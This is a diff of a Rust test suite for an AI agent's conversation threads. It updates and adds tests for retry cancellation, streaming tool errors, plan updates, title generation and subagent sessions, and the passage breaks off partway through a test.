test_terminal_tool_cancellation_captures_output(cx: &mut TestAppContext // Verify the tool result contains the terminal output, not just "Tool canceled by user" thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); let tool_use = agent_message @@ -2144,7 +2245,7 @@ async fn verify_thread_recovery( let events = events.collect::>().await; thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); assert_eq!( agent_message.content, @@ -2453,7 +2554,7 @@ async fn test_terminal_tool_stopped_via_terminal_card_button(cx: &mut TestAppCon // Verify the tool result indicates user stopped thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); let tool_use = agent_message @@ -2548,7 +2649,7 @@ async fn test_terminal_tool_timeout_expires(cx: &mut TestAppContext) { // Verify the tool result indicates timeout, not user stopped thread.update(cx, |thread, _cx| { - let message = thread.last_message().unwrap(); + let message = thread.last_received_or_pending_message().unwrap(); let agent_message = message.as_agent_message().unwrap(); let tool_use = agent_message @@ -2612,6 +2713,84 @@ async fn test_in_progress_send_canceled_by_next_send(cx: &mut TestAppContext) { assert_eq!(stop_events(events_2), vec![acp::StopReason::EndTurn]); } +#[gpui::test] +async fn test_retry_cancelled_promptly_on_new_send(cx: &mut TestAppContext) { + // Regression test: when a completion fails with a retryable error (e.g. upstream 500), + // the retry loop waits on a timer. If the user switches models and sends a new message + // during that delay, the old turn should exit immediately instead of retrying with the + // stale model. + let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; + let model_a = model.as_fake(); + + // Start a turn with model_a. + let events_1 = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Hello"], cx) + }) + .unwrap(); + cx.run_until_parked(); + assert_eq!(model_a.completion_count(), 1); + + // Model returns a retryable upstream 500. The turn enters the retry delay. + model_a.send_last_completion_stream_error( + LanguageModelCompletionError::UpstreamProviderError { + message: "Internal server error".to_string(), + status: http_client::StatusCode::INTERNAL_SERVER_ERROR, + retry_after: None, + }, + ); + model_a.end_last_completion_stream(); + cx.run_until_parked(); + + // The old completion was consumed; model_a has no pending requests yet because the + // retry timer hasn't fired. + assert_eq!(model_a.completion_count(), 0); + + // Switch to model_b and send a new message. This cancels the old turn. + let model_b = Arc::new(FakeLanguageModel::with_id_and_thinking( + "fake", "model-b", "Model B", false, + )); + thread.update(cx, |thread, cx| { + thread.set_model(model_b.clone(), cx); + }); + let events_2 = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Continue"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + // model_b should have received its completion request. + assert_eq!(model_b.as_fake().completion_count(), 1); + + // Advance the clock well past the retry delay (BASE_RETRY_DELAY = 5s). + cx.executor().advance_clock(Duration::from_secs(10)); + cx.run_until_parked(); + + // model_a must NOT have received another completion request — the cancelled turn + // should have exited during the retry delay rather than retrying with the old model. + assert_eq!( + model_a.completion_count(), + 0, + "old model should not receive a retry request after cancellation" + ); + + // Complete model_b's turn. + model_b + .as_fake() + .send_last_completion_stream_text_chunk("Done!"); + model_b + .as_fake() + .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::EndTurn)); + model_b.as_fake().end_last_completion_stream(); + + let events_1 = events_1.collect::>().await; + assert_eq!(stop_events(events_1), vec![acp::StopReason::Cancelled]); + + let events_2 = events_2.collect::>().await; + assert_eq!(stop_events(events_2), vec![acp::StopReason::EndTurn]); +} + #[gpui::test] async fn test_subsequent_successful_sends_dont_cancel(cx: &mut TestAppContext) { let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; @@ -2951,7 +3130,7 @@ async fn test_title_generation(cx: &mut TestAppContext) { fake_model.send_last_completion_stream_text_chunk("Hey!"); fake_model.end_last_completion_stream(); cx.run_until_parked(); - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "New Thread")); + thread.read_with(cx, |thread, _| assert_eq!(thread.title(), None)); // Ensure the summary model has been invoked to generate a title. summary_model.send_last_completion_stream_text_chunk("Hello "); @@ -2960,7 +3139,9 @@ async fn test_title_generation(cx: &mut TestAppContext) { summary_model.end_last_completion_stream(); send.collect::>().await; cx.run_until_parked(); - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world")); + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("Hello world".into())) + }); // Send another message, ensuring no title is generated this time. let send = thread @@ -2974,7 +3155,9 @@ async fn test_title_generation(cx: &mut TestAppContext) { cx.run_until_parked(); assert_eq!(summary_model.pending_completions(), Vec::new()); send.collect::>().await; - thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world")); + thread.read_with(cx, |thread, _| { + assert_eq!(thread.title(), Some("Hello world".into())) + }); } #[gpui::test] @@ -3070,7 +3253,8 @@ async fn test_agent_connection(cx: &mut TestAppContext) { let clock = Arc::new(clock::FakeSystemClock::new()); let client = Client::new(clock, http_client, cx); let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); - language_model::init(client.clone(), cx); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); language_models::init(user_store, client.clone(), cx); LanguageModelRegistry::test(cx); }); @@ -3080,20 +3264,12 @@ async fn test_agent_connection(cx: &mut TestAppContext) { let fake_fs = cx.update(|cx| fs::FakeFs::new(cx.background_executor().clone())); fake_fs.insert_tree(path!("/test"), json!({})).await; let project = Project::test(fake_fs.clone(), [Path::new("/test")], cx).await; - let cwd = Path::new("/test"); + let cwd = PathList::new(&[Path::new("/test")]); let thread_store = cx.new(|cx| ThreadStore::new(cx)); // Create agent and connection - let agent = NativeAgent::new( - project.clone(), - thread_store, - templates.clone(), - None, - fake_fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx + .update(|cx| NativeAgent::new(thread_store, templates.clone(), None, fake_fs.clone(), cx)); let connection = NativeAgentConnection(agent.clone()); // Create a thread using new_thread @@ -3267,6 +3443,118 @@ async fn test_tool_updates_to_completion(cx: &mut TestAppContext) { ); } +#[gpui::test] +async fn test_update_plan_tool_updates_thread_events(cx: &mut TestAppContext) { + let ThreadTest { thread, model, .. } = setup(cx, TestModel::Fake).await; + thread.update(cx, |thread, _cx| thread.add_tool(UpdatePlanTool)); + let fake_model = model.as_fake(); + + let mut events = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Make a plan"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + let input = json!({ + "plan": [ + { + "step": "Inspect the code", + "status": "completed", + }, + { + "step": "Implement the tool", + "status": "in_progress" + }, + { + "step": "Run tests", + "status": "pending", + } + ] + }); + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "plan_1".into(), + name: UpdatePlanTool::NAME.into(), + raw_input: input.to_string(), + input, + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + let tool_call = expect_tool_call(&mut events).await; + assert_eq!( + tool_call, + acp::ToolCall::new("plan_1", "Update plan") + .kind(acp::ToolKind::Think) + .raw_input(json!({ + "plan": [ + { + "step": "Inspect the code", + "status": "completed", + }, + { + "step": "Implement the tool", + "status": "in_progress" + }, + { + "step": "Run tests", + "status": "pending", + } + ] + })) + .meta(acp::Meta::from_iter([( + "tool_name".into(), + "update_plan".into() + )])) + ); + + let update = expect_tool_call_update_fields(&mut events).await; + assert_eq!( + update, + acp::ToolCallUpdate::new( + "plan_1", + acp::ToolCallUpdateFields::new().status(acp::ToolCallStatus::InProgress) + ) + ); + + let plan = expect_plan(&mut events).await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the code", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Run tests", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + + let update = expect_tool_call_update_fields(&mut events).await; + assert_eq!( + update, + acp::ToolCallUpdate::new( + "plan_1", + acp::ToolCallUpdateFields::new() + .status(acp::ToolCallStatus::Completed) + .raw_output("Plan updated") + ) + ); +} + #[gpui::test] async fn test_send_no_retry_on_success(cx: &mut TestAppContext) { let ThreadTest { thread, model, .. } = setup(cx, TestModel::Fake).await; @@ -3444,7 +3732,7 @@ async fn test_send_retry_finishes_tool_calls_on_error(cx: &mut TestAppContext) { events.collect::>().await; thread.read_with(cx, |thread, _cx| { assert_eq!( - thread.last_message(), + thread.last_received_or_pending_message(), Some(Message::Agent(AgentMessage { content: vec![AgentMessageContent::Text("Done".into())], tool_results: IndexMap::default(), @@ -3508,76 +3796,298 @@ async fn test_send_max_retries_exceeded(cx: &mut TestAppContext) { )); } -/// Filters out the stop events for asserting against in tests -fn stop_events(result_events: Vec>) -> Vec { - result_events - .into_iter() - .filter_map(|event| match event.unwrap() { - ThreadEvent::Stop(stop_reason) => Some(stop_reason), - _ => None, - }) - .collect() -} - -struct ThreadTest { - model: Arc, - thread: Entity, - project_context: Entity, - context_server_store: Entity, - fs: Arc, -} - -enum TestModel { - Sonnet4, - Fake, -} +#[gpui::test] +async fn test_streaming_tool_completes_when_llm_stream_ends_without_final_input( + cx: &mut TestAppContext, +) { + init_test(cx); + always_allow_tools(cx); -impl TestModel { - fn id(&self) -> LanguageModelId { - match self { - TestModel::Sonnet4 => LanguageModelId("claude-sonnet-4-latest".into()), - TestModel::Fake => unreachable!(), - } - } -} + let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); -async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest { - cx.executor().allow_parking(); + thread.update(cx, |thread, _cx| { + thread.add_tool(StreamingEchoTool::new()); + }); - let fs = FakeFs::new(cx.background_executor.clone()); - fs.create_dir(paths::settings_file().parent().unwrap()) - .await - .unwrap(); - fs.insert_file( - paths::settings_file(), - json!({ - "agent": { - "default_profile": "test-profile", - "profiles": { - "test-profile": { - "name": "Test Profile", - "tools": { - EchoTool::NAME: true, - DelayTool::NAME: true, - WordListTool::NAME: true, - ToolRequiringPermission::NAME: true, - InfiniteTool::NAME: true, - CancellationAwareTool::NAME: true, - (TerminalTool::NAME): true, - } - } - } - } + let _events = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Use the streaming_echo tool"], cx) }) - .to_string() - .into_bytes(), - ) - .await; + .unwrap(); + cx.run_until_parked(); - cx.update(|cx| { - settings::init(cx); + // Send a partial tool use (is_input_complete = false), simulating the LLM + // streaming input for a tool. + let tool_use = LanguageModelToolUse { + id: "tool_1".into(), + name: "streaming_echo".into(), + raw_input: r#"{"text": "partial"}"#.into(), + input: json!({"text": "partial"}), + is_input_complete: false, + thought_signature: None, + }; + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use.clone())); + cx.run_until_parked(); - match model { + // Send a stream error WITHOUT ever sending is_input_complete = true. + // Before the fix, this would deadlock: the tool waits for more partials + // (or cancellation), run_turn_internal waits for the tool, and the sender + // keeping the channel open lives inside RunningTurn. + fake_model.send_last_completion_stream_error( + LanguageModelCompletionError::UpstreamProviderError { + message: "Internal server error".to_string(), + status: http_client::StatusCode::INTERNAL_SERVER_ERROR, + retry_after: None, + }, + ); + fake_model.end_last_completion_stream(); + + // Advance past the retry delay so run_turn_internal retries. + cx.executor().advance_clock(Duration::from_secs(5)); + cx.run_until_parked(); + + // The retry request should contain the streaming tool's error result, + // proving the tool terminated and its result was forwarded. + let completion = fake_model + .pending_completions() + .pop() + .expect("No running turn"); + assert_eq!( + completion.messages[1..], + vec![ + LanguageModelRequestMessage { + role: Role::User, + content: vec!["Use the streaming_echo tool".into()], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::Assistant, + content: vec![language_model::MessageContent::ToolUse(tool_use.clone())], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::User, + content: vec![language_model::MessageContent::ToolResult( + LanguageModelToolResult { + tool_use_id: tool_use.id.clone(), + tool_name: tool_use.name, + is_error: true, + content: "Failed to receive tool input: tool input was not fully received" + .into(), + output: Some( + "Failed to receive tool input: tool input was not fully received" + .into() + ), + } + )], + cache: true, + reasoning_details: None, + }, + ] + ); + + // Finish the retry round so the turn completes cleanly. + fake_model.send_last_completion_stream_text_chunk("Done"); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + thread.read_with(cx, |thread, _cx| { + assert!( + thread.is_turn_complete(), + "Thread should not be stuck; the turn should have completed", + ); + }); +} + +#[gpui::test] +async fn test_streaming_tool_json_parse_error_is_forwarded_to_running_tool( + cx: &mut TestAppContext, +) { + init_test(cx); + always_allow_tools(cx); + + let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); + + thread.update(cx, |thread, _cx| { + thread.add_tool(StreamingJsonErrorContextTool); + }); + + let _events = thread + .update(cx, |thread, cx| { + thread.send( + UserMessageId::new(), + ["Use the streaming_json_error_context tool"], + cx, + ) + }) + .unwrap(); + cx.run_until_parked(); + + let tool_use = LanguageModelToolUse { + id: "tool_1".into(), + name: StreamingJsonErrorContextTool::NAME.into(), + raw_input: r#"{"text": "partial"#.into(), + input: json!({"text": "partial"}), + is_input_complete: false, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use)); + cx.run_until_parked(); + + fake_model.send_last_completion_stream_event( + LanguageModelCompletionEvent::ToolUseJsonParseError { + id: "tool_1".into(), + tool_name: StreamingJsonErrorContextTool::NAME.into(), + raw_input: r#"{"text": "partial"#.into(), + json_parse_error: "EOF while parsing a string at line 1 column 17".into(), + }, + ); + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + cx.executor().advance_clock(Duration::from_secs(5)); + cx.run_until_parked(); + + let completion = fake_model + .pending_completions() + .pop() + .expect("No running turn"); + + let tool_results: Vec<_> = completion + .messages + .iter() + .flat_map(|message| &message.content) + .filter_map(|content| match content { + MessageContent::ToolResult(result) + if result.tool_use_id == language_model::LanguageModelToolUseId::from("tool_1") => + { + Some(result) + } + _ => None, + }) + .collect(); + + assert_eq!( + tool_results.len(), + 1, + "Expected exactly 1 tool result for tool_1, got {}: {:#?}", + tool_results.len(), + tool_results + ); + + let result = tool_results[0]; + assert!(result.is_error); + let content_text = match &result.content { + language_model::LanguageModelToolResultContent::Text(text) => text.to_string(), + other => panic!("Expected text content, got {:?}", other), + }; + assert!( + content_text.contains("Saw partial text 'partial' before invalid JSON"), + "Expected tool-enriched partial context, got: {content_text}" + ); + assert!( + content_text + .contains("Error parsing input JSON: EOF while parsing a string at line 1 column 17"), + "Expected forwarded JSON parse error, got: {content_text}" + ); + assert!( + !content_text.contains("tool input was not fully received"), + "Should not contain orphaned sender error, got: {content_text}" + ); + + fake_model.send_last_completion_stream_text_chunk("Done"); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + thread.read_with(cx, |thread, _cx| { + assert!( + thread.is_turn_complete(), + "Thread should not be stuck; the turn should have completed", + ); + }); +} + +/// Filters out the stop events for asserting against in tests +fn stop_events(result_events: Vec>) -> Vec { + result_events + .into_iter() + .filter_map(|event| match event.unwrap() { + ThreadEvent::Stop(stop_reason) => Some(stop_reason), + _ => None, + }) + .collect() +} + +struct ThreadTest { + model: Arc, + thread: Entity, + project_context: Entity, + context_server_store: Entity, + fs: Arc, +} + +enum TestModel { + Sonnet4, + Fake, +} + +impl TestModel { + fn id(&self) -> LanguageModelId { + match self { + TestModel::Sonnet4 => LanguageModelId("claude-sonnet-4-latest".into()), + TestModel::Fake => unreachable!(), + } + } +} + +async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest { + cx.executor().allow_parking(); + + let fs = FakeFs::new(cx.background_executor.clone()); + fs.create_dir(paths::settings_file().parent().unwrap()) + .await + .unwrap(); + fs.insert_file( + paths::settings_file(), + json!({ + "agent": { + "default_profile": "test-profile", + "profiles": { + "test-profile": { + "name": "Test Profile", + "tools": { + EchoTool::NAME: true, + DelayTool::NAME: true, + WordListTool::NAME: true, + ToolRequiringPermission::NAME: true, + InfiniteTool::NAME: true, + CancellationAwareTool::NAME: true, + StreamingEchoTool::NAME: true, + StreamingJsonErrorContextTool::NAME: true, + StreamingFailingEchoTool::NAME: true, + TerminalTool::NAME: true, + UpdatePlanTool::NAME: true, + } + } + } + } + }) + .to_string() + .into_bytes(), + ) + .await; + + cx.update(|cx| { + settings::init(cx); + + match model { TestModel::Fake => {} TestModel::Sonnet4 => { gpui_tokio::init(cx); @@ -3585,7 +4095,8 @@ async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest { cx.set_http_client(Arc::new(http_client)); let client = Client::production(cx); let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); - language_model::init(client.clone(), cx); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); language_models::init(user_store, client.clone(), cx); } }; @@ -4182,23 +4693,16 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4268,7 +4772,153 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) { ## Assistant - subagent task response + subagent task response + + "} + ); + + model.send_last_completion_stream_text_chunk("Response"); + model.end_last_completion_stream(); + + send.await.unwrap(); + + assert_eq!( + acp_thread.read_with(cx, |thread, cx| thread.to_markdown(cx)), + indoc! {r#" + ## User + + Prompt + + ## Assistant + + spawning subagent + + **Tool Call: label** + Status: Completed + + subagent task response + + ## Assistant + + Response + + "#}, + ); +} + +#[gpui::test] +async fn test_subagent_tool_output_does_not_include_thinking(cx: &mut TestAppContext) { + init_test(cx); + cx.update(|cx| { + LanguageModelRegistry::test(cx); + }); + cx.update(|cx| { + cx.update_flags(true, vec!["subagents".to_string()]); + }); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/", + json!({ + "a": { + "b.md": "Lorem" + } + }), + ) + .await; + let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); + let connection = Rc::new(NativeAgentConnection(agent.clone())); + + let acp_thread = cx + .update(|cx| { + connection + .clone() + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) + }) + .await + .unwrap(); + let session_id = acp_thread.read_with(cx, |thread, _| thread.session_id().clone()); + let thread = agent.read_with(cx, |agent, _| { + agent.sessions.get(&session_id).unwrap().thread.clone() + }); + let model = Arc::new(FakeLanguageModel::default()); + + // Ensure empty threads are not saved, even if they get mutated. + thread.update(cx, |thread, cx| { + thread.set_model(model.clone(), cx); + }); + cx.run_until_parked(); + + let send = acp_thread.update(cx, |thread, cx| thread.send_raw("Prompt", cx)); + cx.run_until_parked(); + model.send_last_completion_stream_text_chunk("spawning subagent"); + let subagent_tool_input = SpawnAgentToolInput { + label: "label".to_string(), + message: "subagent task prompt".to_string(), + session_id: None, + }; + let subagent_tool_use = LanguageModelToolUse { + id: "subagent_1".into(), + name: SpawnAgentTool::NAME.into(), + raw_input: serde_json::to_string(&subagent_tool_input).unwrap(), + input: serde_json::to_value(&subagent_tool_input).unwrap(), + is_input_complete: true, + thought_signature: None, + }; + model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + subagent_tool_use, + )); + model.end_last_completion_stream(); + + cx.run_until_parked(); + + let subagent_session_id = thread.read_with(cx, |thread, cx| { + thread + .running_subagent_ids(cx) + .get(0) + .expect("subagent thread should be running") + .clone() + }); + + let subagent_thread = agent.read_with(cx, |agent, _cx| { + agent + .sessions + .get(&subagent_session_id) + .expect("subagent session should exist") + .acp_thread + .clone() + }); + + model.send_last_completion_stream_text_chunk("subagent task response 1"); + model.send_last_completion_stream_event(LanguageModelCompletionEvent::Thinking { + text: "thinking more about the subagent task".into(), + signature: None, + }); + model.send_last_completion_stream_text_chunk("subagent task response 2"); + model.end_last_completion_stream(); + + cx.run_until_parked(); + + assert_eq!( + subagent_thread.read_with(cx, |thread, cx| thread.to_markdown(cx)), + indoc! {" + ## User + + subagent task prompt + + ## Assistant + + subagent task response 1 + + + thinking more about the subagent task + + + subagent task response 2 "} ); @@ -4292,8 +4942,9 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) { **Tool Call: label** Status: Completed - subagent task response + subagent task response 1 + subagent task response 2 ## Assistant @@ -4325,23 +4976,16 @@ async fn test_subagent_tool_call_cancellation_during_task_prompt(cx: &mut TestAp .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4462,23 +5106,16 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4627,48 +5264,6 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) { ); } -#[gpui::test] -async fn test_subagent_tool_is_present_when_feature_flag_enabled(cx: &mut TestAppContext) { - init_test(cx); - - cx.update(|cx| { - cx.update_flags(true, vec!["subagents".to_string()]); - }); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/test"), json!({})).await; - let project = Project::test(fs, [path!("/test").as_ref()], cx).await; - let project_context = cx.new(|_cx| ProjectContext::default()); - let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - - let environment = Rc::new(cx.update(|cx| { - FakeThreadEnvironment::default().with_terminal(FakeTerminalHandle::new_never_exits(cx)) - })); - - let thread = cx.new(|cx| { - let mut thread = Thread::new( - project.clone(), - project_context, - context_server_registry, - Templates::new(), - Some(model), - cx, - ); - thread.add_default_tools(environment, cx); - thread - }); - - thread.read_with(cx, |thread, _| { - assert!( - thread.has_registered_tool(SpawnAgentTool::NAME), - "subagent tool should be present when feature flag is enabled" - ); - }); -} - #[gpui::test] async fn test_subagent_thread_inherits_parent_thread_properties(cx: &mut TestAppContext) { init_test(cx); @@ -4709,6 +5304,11 @@ async fn test_subagent_thread_inherits_parent_thread_properties(cx: &mut TestApp subagent_thread.parent_thread_id(), Some(parent_thread.read(cx).id().clone()) ); + + let request = subagent_thread + .build_completion_request(CompletionIntent::UserPrompt, cx) + .unwrap(); + assert_eq!(request.intent, Some(CompletionIntent::Subagent)); }); } @@ -4841,23 +5441,16 @@ async fn test_subagent_context_window_warning(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4974,23 +5567,16 @@ async fn test_subagent_no_context_window_warning_when_already_at_warning(cx: &mu .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -5155,23 +5741,16 @@ async fn test_subagent_error_propagation(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -5741,9 +6320,9 @@ async fn test_edit_file_tool_allow_rule_skips_confirmation(cx: &mut TestAppConte cx.run_until_parked(); - let event = rx.try_next(); + let event = rx.try_recv(); assert!( - !matches!(event, Ok(Some(Ok(ThreadEvent::ToolCallAuthorization(_))))), + !matches!(event, Ok(Ok(ThreadEvent::ToolCallAuthorization(_)))), "expected no authorization request for allowed .md file" ); } @@ -5885,9 +6464,9 @@ async fn test_fetch_tool_allow_rule_skips_confirmation(cx: &mut TestAppContext) cx.run_until_parked(); - let event = rx.try_next(); + let event = rx.try_recv(); assert!( - !matches!(event, Ok(Some(Ok(ThreadEvent::ToolCallAuthorization(_))))), + !matches!(event, Ok(Ok(ThreadEvent::ToolCallAuthorization(_)))), "expected no authorization request for allowed docs.rs URL" ); } @@ -5976,3 +6555,303 @@ async fn test_queued_message_ends_turn_at_boundary(cx: &mut TestAppContext) { ); }); } + +#[gpui::test] +async fn test_streaming_tool_error_breaks_stream_loop_immediately(cx: &mut TestAppContext) { + init_test(cx); + always_allow_tools(cx); + + let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); + + thread.update(cx, |thread, _cx| { + thread.add_tool(StreamingFailingEchoTool { + receive_chunks_until_failure: 1, + }); + }); + + let _events = thread + .update(cx, |thread, cx| { + thread.send( + UserMessageId::new(), + ["Use the streaming_failing_echo tool"], + cx, + ) + }) + .unwrap(); + cx.run_until_parked(); + + let tool_use = LanguageModelToolUse { + id: "call_1".into(), + name: StreamingFailingEchoTool::NAME.into(), + raw_input: "hello".into(), + input: json!({}), + is_input_complete: false, + thought_signature: None, + }; + + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use.clone())); + + cx.run_until_parked(); + + let completions = fake_model.pending_completions(); + let last_completion = completions.last().unwrap(); + + assert_eq!( + last_completion.messages[1..], + vec![ + LanguageModelRequestMessage { + role: Role::User, + content: vec!["Use the streaming_failing_echo tool".into()], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::Assistant, + content: vec![language_model::MessageContent::ToolUse(tool_use.clone())], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::User, + content: vec![language_model::MessageContent::ToolResult( + LanguageModelToolResult { + tool_use_id: tool_use.id.clone(), + tool_name: tool_use.name, + is_error: true, + content: "failed".into(), + output: Some("failed".into()), + } + )], + cache: true, + reasoning_details: None, + }, + ] + ); +} + +#[gpui::test] +async fn test_streaming_tool_error_waits_for_prior_tools_to_complete(cx: &mut TestAppContext) { + init_test(cx); + always_allow_tools(cx); + + let ThreadTest { model, thread, .. } = setup(cx, TestModel::Fake).await; + let fake_model = model.as_fake(); + + let (complete_streaming_echo_tool_call_tx, complete_streaming_echo_tool_call_rx) = + oneshot::channel(); + + thread.update(cx, |thread, _cx| { + thread.add_tool( + StreamingEchoTool::new().with_wait_until_complete(complete_streaming_echo_tool_call_rx), + ); + thread.add_tool(StreamingFailingEchoTool { + receive_chunks_until_failure: 1, + }); + }); + + let _events = thread + .update(cx, |thread, cx| { + thread.send( + UserMessageId::new(), + 